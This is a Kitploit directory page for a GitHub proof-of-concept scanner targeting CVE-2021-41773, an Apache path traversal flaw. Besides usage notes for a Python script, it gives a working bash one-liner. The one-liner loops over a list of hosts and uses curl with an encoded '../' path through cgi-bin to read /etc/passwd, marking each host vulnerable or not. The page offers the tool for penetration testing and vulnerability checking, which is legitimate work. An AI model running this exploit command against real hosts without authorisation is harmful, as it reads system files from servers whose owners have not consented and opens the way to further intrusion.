Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-41773-PoC — Proof-of-concept scanner that checks hosts for CVE-2021-41773 Apache path traversal vulnerability, reporting vulnerable or not vulnerable status. | Kitploit
Tools/GitHubGitHub/zephrfish/cve-2021-41773-poc
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationPenetration Testing
GitHubzephrfish/cve-2021-41773-poc

CVE-2021-41773-PoC

Proof-of-concept scanner that checks hosts for CVE-2021-41773 Apache path traversal vulnerability, reporting vulnerable or not vulnerable status.

View Repository
171131 month agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-41773 Proof of Concept

Quick and dirty proof of concept for checking if hosts vulnerable to CVE-2021-41773

root@kitploit:~
python3 full.py hosts.txt

Where hosts.txt contains your targets:

root@kitploit:~
domain.com
blah.com
192.168.1.1

It'll print out if the host is vulnerable or not vulnerable.

Python version of bash:

root@kitploit:~
cat hosts.txt | while read host do ; do curl -k --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done

Enjoy!

Download Tool